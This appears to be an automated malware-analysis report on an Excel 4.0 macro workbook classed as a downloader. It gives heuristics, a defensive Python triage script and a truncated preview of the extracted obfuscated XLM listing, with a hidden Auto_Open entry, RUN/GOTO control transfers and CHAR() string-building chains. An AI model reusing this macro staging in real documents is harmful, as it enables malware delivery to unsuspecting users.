Verdict: MALICIOUS
Risk Score: 140

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
The critical heuristics indicate an Excel 4.0 (XLM) macro sheet with an Auto_Open defined name, a well-known mechanism for running macro code as soon as the workbook is opened; the recovered name is hidden and points at Sheet!EH17079. The macro listing uses XLM formula APIs that execute code or transfer control, among them RUN, SET.VALUE, FORMULA.FILL and GOTO, and it assembles strings at runtime from long CHAR() chains over cell arithmetic, which is typical obfuscation for a macro-based downloader or dropper that stages a secondary payload. The visible part of the listing shows the string-building and control-transfer stages rather than an explicit download call, so the downloader classification rests on that pattern, not on a recovered URL.
Heuristics (3)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| Excel 4.0 Auto_Open defined name | critical | OLE_XLM_AUTOOPEN_DEFINEDNAME | oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry. |
| XLM Auto_Open with dangerous formula APIs | critical | OLE_XLM_DANGEROUS_FN | The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA. |
| Excel 4.0 (XLM) macro sheet present | medium | OLE_XLM_AUTOOPEN | The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022. |
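The three heuristics above, applied in code to the kind of listing olevba produced for this sample, as an added example (this is not part of the report and not oletools code). It assumes the listing layout visible in the preview further down: BIFF record comments (BOUNDSHEET, the built-in-name record for Auto_Open) followed by a CSV section headed `Sheet,Reference,Formula,Value`, each line prefixed with `' `. The heuristic IDs and severities are the report's; the dangerous-function list, the CHAR() chain threshold and the verdict rule are assumptions made for illustration, and the embedded input is a trimmed excerpt of the listing shown on this page.

```python
"""Triage an olevba-style Excel 4.0 (XLM) macro listing.

Added example, not part of this report or of oletools. It assumes the listing
shape shown in the preview: BIFF record comments (BOUNDSHEET, the built-in-name
record for Auto_Open) and then a CSV section headed "Sheet,Reference,Formula,Value",
each line prefixed with "' ". Heuristic IDs mirror the report's; the dangerous
function list and the CHAR() threshold are assumptions.
"""
import csv
import re

# XLM functions that run code, write files or transfer control (assumed list; the
# report names RUN and SET.VALUE, and the listing also shows FORMULA.FILL and GOTO).
DANGEROUS_FNS = {"RUN", "EXEC", "CALL", "REGISTER", "FORMULA", "FORMULA.FILL",
                 "FORMULA.ARRAY", "SET.VALUE", "GOTO", "FOPEN", "FWRITE", "FWRITELN"}
CHAR_CHAIN_MIN = 4  # CHAR() calls in one formula before we call it string obfuscation (assumed)
HEURISTICS = {"OLE_XLM_AUTOOPEN": "medium",            # id -> severity, as in the report
              "OLE_XLM_AUTOOPEN_DEFINEDNAME": "critical",
              "OLE_XLM_DANGEROUS_FN": "critical"}

FN_CALL = re.compile(r"(?<![A-Z0-9.])([A-Z][A-Z0-9.]*)\(")
AUTO_NAME = re.compile(r"built-in-name\s+\d+\s+(Auto_Open|Auto_Close)\b(.*)")
REF3D = re.compile(r"ptgRef3d\s+(\S+)")

# Constructed input: a trimmed excerpt of the listing in this report (the ET1801
# CHAR() chain is cut to four terms to keep the sample short).
SAMPLE_LISTING = """
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet
' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!EH17079
' Sheet,Reference,Formula,Value
' Sheet,S19,"",0.67222222222222216548
' Sheet,EX110,"SET.VALUE(HC46079,363/5)",""
' Sheet,EX111,GOTO(BJ51366),""
' Sheet,GI353,"SET.VALUE(JH23972,GET.CELL(50,DI58290)+-368.00000000000000000000-4)",""
' Sheet,GI354,RUN(IL49025),""
' Sheet,ET1801,"FORMULA.FILL(CHAR(HR39641+G19229)&CHAR(DQ6366+DE21491)&CHAR(EK12587*EI24396)&CHAR(IF40813+IR28440),ET1802)",""
' Sheet,ET1803,GOTO(GO4355),""
"""


def parse_listing(text):
    """Return (record_comments, cells); each cell is (sheet, ref, formula, value)."""
    records, cells, in_csv = [], [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("'"):          # olevba prints the listing as VBA-style comments
            line = line[1:].strip()
        if not line:
            continue
        if line == "Sheet,Reference,Formula,Value":
            in_csv = True
        elif not in_csv:
            records.append(line)
        else:
            row = next(csv.reader([line]))  # formulas containing commas are quoted
            if len(row) >= 4:
                cells.append(tuple(row[:4]))
    return records, cells


def triage(text):
    """Apply the report's three XLM heuristics to a listing and return the findings."""
    records, cells = parse_listing(text)
    result = {
        "xlm_sheet": any("BOUNDSHEET" in r and "Excel 4.0 macro sheet" in r for r in records),
        "auto_names": [],        # Auto_Open / Auto_Close defined names and where they point
        "dangerous_calls": [],   # (cell, function) for each dangerous API call
        "obfuscated_cells": [],  # cells that build strings from CHAR() arithmetic
    }
    for rec in records:
        m = AUTO_NAME.search(rec)
        if m:
            tail, target = m.group(2), REF3D.search(m.group(2))
            result["auto_names"].append({"name": m.group(1),
                                         "hidden": "hidden" in tail.split(),
                                         "target": target.group(1) if target else None})
    for _sheet, ref, formula, _value in cells:
        if not formula:
            continue                      # plain numeric cell, typically an obfuscation operand
        result["dangerous_calls"] += [(ref, fn) for fn in FN_CALL.findall(formula)
                                      if fn in DANGEROUS_FNS]
        if formula.count("CHAR(") >= CHAR_CHAIN_MIN:
            result["obfuscated_cells"].append(ref)
    checks = [("OLE_XLM_AUTOOPEN", result["xlm_sheet"]),
              ("OLE_XLM_AUTOOPEN_DEFINEDNAME", bool(result["auto_names"])),
              ("OLE_XLM_DANGEROUS_FN", bool(result["auto_names"] and result["dangerous_calls"]))]
    result["fired"] = [(hid, HEURISTICS[hid]) for hid, hit in checks if hit]  # (id, severity)
    severities = {sev for _, sev in result["fired"]}
    result["verdict"] = ("MALICIOUS" if "critical" in severities
                         else "SUSPICIOUS" if severities else "CLEAN")
    return result


if __name__ == "__main__":
    for key, val in triage(SAMPLE_LISTING).items():
        print(f"{key}: {val}")
```

On the excerpt above the script fires all three heuristics, reports the hidden Auto_Open name resolving to Sheet!EH17079, lists SET.VALUE, GOTO, RUN and FORMULA.FILL by cell, and flags ET1801 as a CHAR()-built string. A real deobfuscation pass would additionally need the numeric cells the CHAR() arguments reference, most of which lie outside the 1,000-line preview.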
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 130585 bytes | 97c3e4918a2e7e7c16a7412de0ba91e15a1a1b111febaeea9a580d663f3ebc69 |
Preview script (first 1,000 lines of the extracted script):

```text
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet
' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!EH17079
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' Sheet,S19,"",0.67222222222222216548
' Sheet,JN38,"",2869.00000000000000000000
' Sheet,BE93,"",-2799.00000000000000000000
' Sheet,EX110,"SET.VALUE(HC46079,363/5)",""
' Sheet,EX111,GOTO(BJ51366),""
' Sheet,CW173,"",-28.81318681318681385051
' Sheet,EJ188,"",147.40007812499999317879
' Sheet,HW200,"",-2.37362637362637363125
' Sheet,HE228,"",453.50000000000000000000
' Sheet,EF260,"",-1.41025641025641035320
' Sheet,JH331,"",-1.15882352941176458572
' Sheet,CQ334,"",198.00000000000000000000
' Sheet,GR339,"",2852.00000000000000000000
' Sheet,GI353,"SET.VALUE(JH23972,GET.CELL(50,DI58290)+-368.00000000000000000000-4)",""
' Sheet,GI354,RUN(IL49025),""
' Sheet,JF473,"",0.19578947368421051323
' Sheet,GR536,"",-0.21311475409836064254
' Sheet,JU559,"",-0.41417910447761191461
' Sheet,CZ594,"",-0.83870967741935487094
' Sheet,EX598,"",6.88405797101449312692
' Sheet,DZ630,"",-5.50746268656716431167
' Sheet,H635,"",404.00000000000000000000
' Sheet,CZ663,"",-0.44262295081967212296
' Sheet,EZ675,"",0.07960199004975124226
' Sheet,JG757,"",-6.10000488281249975131
' Sheet,JJ774,"",429.00000000000000000000
' Sheet,JQ779,"",431.00000000000000000000
' Sheet,BX824,"",322.00000000000000000000
' Sheet,CB949,"",-2.16666666666666651864
' Sheet,EB973,"",0.67850467289719618158
' Sheet,FP989,"",-6.70000488281250028422
' Sheet,BJ1047,"",285.00000000000000000000
' Sheet,FJ1066,"",313.00000000000000000000
' Sheet,G1158,"",-98.75000000000000000000
' Sheet,CW1163,"",265.00000000000000000000
' Sheet,JF1171,"",-18.75000000000000000000
' Sheet,M1225,"",-30.75000000000000000000
' Sheet,CZ1274,"",0.02714776632302405568
' Sheet,FI1307,"",0.31272727272727274261
' Sheet,BE1308,"",-293.00000000000000000000
' Sheet,GR1403,"",-3.13043478260869578733
' Sheet,IX1409,"",-32.77501953125000255795
' Sheet,GG1415,"",314.00000000000000000000
' Sheet,FC1441,"",-2856.00000000000000000000
' Sheet,HI1481,"",-315.00000000000000000000
' Sheet,DO1483,"",-0.18852459016393441349
' Sheet,JB1507,"",10.25510204081632714690
' Sheet,ID1523,"",-247.00000000000000000000
' Sheet,Q1556,"",-0.43032786885245899455
' Sheet,EE1558,"",589.00000000000000000000
' Sheet,F1621,"",-9.22500488281250063949
' Sheet,DK1636,"",-309.00000000000000000000
' Sheet,BE1658,"",-1.01025641025641021997
' Sheet,IX1658,"",-0.37962962962962965019
' Sheet,HT1692,"",214.00000000000000000000
' Sheet,BD1800,"",-0.03127383676582761590
' Sheet,ET1801,"FORMULA.FILL(CHAR(HR39641+G19229)&CHAR(DQ6366+DE21491)&CHAR(EK12587*EI24396)&CHAR(IF40813+IR28440)&CHAR(JC16649+BJ1047)&CHAR(EK12587*IU44129)&CHAR(JH23972*GJ51208)&CHAR(IF40813/DU63381)&CHAR(DQ6366/EN45003)&CHAR(JC16649+IX53149)&CHAR(DC38998/DL2681)&CHAR(IU35778+EB28757)&CHAR(DQ6366+IF21002)&CHAR(DO8517*HB46889)&CHAR(EA20210-Q37130)&CHAR(EK12587*FU61017)&CHAR(JH23972+GI36796)&CHAR(IF40813-FM35408)&CHAR(EA20210-DF64003)&CHAR(JH23972-GH4116)&CHAR(HR39641*FN20562)&CHAR(EA20210*DW51344),ET1802)",""
' Sheet,ET1803,GOTO(GO4355),""
' Sheet,F1815,"",-0.40163934426229508379
' Sheet,HS1841,"",-430.00000000000000000000
' Sheet,EF1898,"",10.79545454545454497008
' Sheet,HN1898,"",6.98529411764705887578
' Sheet,GD1923,"",-0.41393442622950821219
' Sheet,HM1942,"",134.50000000000000000000
' Sheet,CV1981,"FORMULA.FILL(CHAR(DU57124+Q41384)&CHAR(DQ22215+HW12711)&CHAR(JF7021/FD41122)&CHAR(DJ27233/T34888)&CHAR(DQ22215+FB39865)&CHAR(JS22779+H53258)&CHAR(JP52329-HV39723)&CHAR(DQ22215-Z4771)&CHAR(P20963+JK61516)&CHAR(JP52329*HO55806)&CHAR(HC46079/S19)&CHAR(JP52329+BV39906)&CHAR(DJ27233/CA45189)&CHAR(HC46079/EB973)&CHAR(DJ27233+FA52414)&CHAR(CB27422/ED26759)&CHAR ... (truncated)
```